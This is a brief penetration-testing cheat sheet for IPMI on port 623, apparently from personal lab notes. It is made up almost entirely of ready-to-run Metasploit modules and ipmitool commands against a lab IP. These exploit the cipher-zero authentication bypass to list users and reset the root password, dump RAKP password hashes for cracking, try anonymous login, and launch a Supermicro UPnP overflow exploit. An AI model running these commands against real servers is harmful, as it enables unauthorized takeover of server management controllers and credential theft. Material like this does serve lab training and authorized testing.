623) IPMI

  • Enumerations

## ------------------| Version Detection
use auxiliary/scanner/ipmi/ipmi_version
  • Vulnerabilities

## ------------------| Change password for root user
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user set password 2 newpassword 
       
## ------------------| IPMI Authentication Bypass via Cipher 0
use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user list #C 0 to dump a list of users.                     

## ------------------| IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
use auxiliary/scanner/ipmi/ipmi_dumphashes
set OUTPUT_HASHCAT_FILE cat-hash
set OUTPUT_JOHN_FILE john-hash
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user list

## ------------------| IPMI Anonymous Authentication
ipmitool -I lanplus -H 10.10.11.124 -U '' -P '' user list

## ------------------| Supermicro IPMI UPnP
use exploit/multi/upnp/libupnp_ssdp_overflow

Last updated